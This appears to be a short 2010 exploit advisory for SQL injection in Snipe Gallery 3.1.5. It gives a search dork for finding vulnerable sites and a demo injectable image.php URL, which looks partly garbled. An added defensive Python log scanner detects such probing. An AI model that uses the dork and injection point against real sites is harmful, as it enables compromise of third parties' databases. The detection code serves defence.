# Exploit Title: snipe gallery Script Sql Injection
# Date: 26/06/2010
# Author: dev!l ghost
# Email: aws(at)live(dot)it
# Site : www.h00forall.com
# Script url: http://sourceforge.net/projects/snipegallery/
# Version: 3.1.5
# Tested on: Windows
# CVE : ()

:::::::::::::::::::::::::

=================Exploit=================
DorK:(Snipe Gallery v.3.1.5 by Snipe.Net)

When you search with the dork you will find a lot of sites. Enter a
site and you will find a lot of pictures; enter any picture, then
put the (') and start the injection.

The injection is very easy.

----exploit----

{{DeMo}}
http://www.example.com/snipe/image.php?page=1&search_type=and?_id=78(SQLI)
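
For administrators running this script, a check of web server access logs for the request pattern in the demo URL above. This is an added example, not part of the original advisory. The log format, the sample lines, the function names and the placeholder parameter name some_id are assumptions; the id parameter is matched by its _id suffix because the demo URL shows only that much of the name.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')
# Parameters the demo URL shows as plain integers: "page" and the "..._id" value.
NUMERIC_PARAM_RE = re.compile(r'^(?:page|\w*_id)$', re.IGNORECASE)
DIGITS_RE = re.compile(r'[0-9]+')


def suspicious_params(url):
    """Return (name, value) pairs on image.php where a numeric parameter is not all digits."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/image.php"):
        return []
    hits = []
    # parse_qsl percent-decodes values, so %27 and a literal ' are treated alike.
    for name, value in parse_qsl(parts.query):
        if NUMERIC_PARAM_RE.match(name) and not DIGITS_RE.fullmatch(value):
            hits.append((name, value))
    return hits


def scan(log_lines):
    """Return (client_ip, url, hits) for each log line with a non-numeric id/page value."""
    findings = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = suspicious_params(m.group(1))
        if hits:
            findings.append((line.split(" ", 1)[0], m.group(1), hits))
    return findings


# Constructed sample log lines (documentation IP ranges, placeholder parameter name).
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Jun/2010:10:00:01 +0000] "GET /snipe/image.php?page=1&search_type=and&some_id=78 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [26/Jun/2010:10:00:05 +0000] "GET /snipe/image.php?page=1&search_type=and&some_id=78%27 HTTP/1.1" 500 312',
    '198.51.100.7 - - [26/Jun/2010:10:00:09 +0000] "GET /snipe/index.php?some_id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, url, hits in scan(SAMPLE_LOG):
        print(ip, url, hits)
```

The same digits-only rule, enforced in the application before the value reaches the query, is what closes the hole; the log check only shows who has been probing it.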

---------greetz----------
Greetz to all my friends and all Muslims
and Volc4n0 and Golden Ice and mr.ip
and the all